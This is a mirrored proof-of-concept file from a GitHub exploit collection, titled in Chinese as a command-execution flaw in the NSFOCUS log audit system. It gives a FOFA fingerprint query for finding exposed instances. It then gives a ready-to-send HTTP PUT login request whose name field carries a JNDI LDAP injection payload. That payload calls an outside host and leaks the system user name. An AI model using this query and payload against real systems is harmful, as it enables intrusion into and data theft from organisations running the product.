mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
33 lines
1.0 KiB
Markdown
33 lines
1.0 KiB
Markdown
![]() |
## 绿盟日志审计系统存在命令执行漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
"<title>{{platformName}}</title>" && icon_hash="-1566499661"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
PUT /api/v1/login HTTP/1.1
|
||
|
Host:
|
||
|
Connection: keep-alive
|
||
|
Content-Length: 36
|
||
|
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
|
||
|
Accept: application/json, text/plain, */*
|
||
|
Content-Type: application/json;charset=UTF-8
|
||
|
Accept-Language: zh_CN
|
||
|
sec-ch-ua-mobile: ?0
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
|
||
|
sec-ch-ua-platform: "Windows"
|
||
|
Sec-Fetch-Site: same-origin
|
||
|
Sec-Fetch-Mode: cors
|
||
|
Sec-Fetch-Dest: empty
|
||
|
Accept-Encoding: gzip, deflate, br
|
||
|
Cookie: JSESSIONID=C2CBDF46F7B53365D2ECE60AA645B673; sessionid=w0gr7fyrkt56tf6yc3sr0pw6mjl59txi
|
||
|
|
||
|
{"name":"${jndi:ldap://${sys:user.name}.a24693ffbb.ipv6.1433.eu.org}","password":"2Y4W5F5h"}
|
||
|
```
|
||
|
|
||
|

|
||
|
|
||
|

|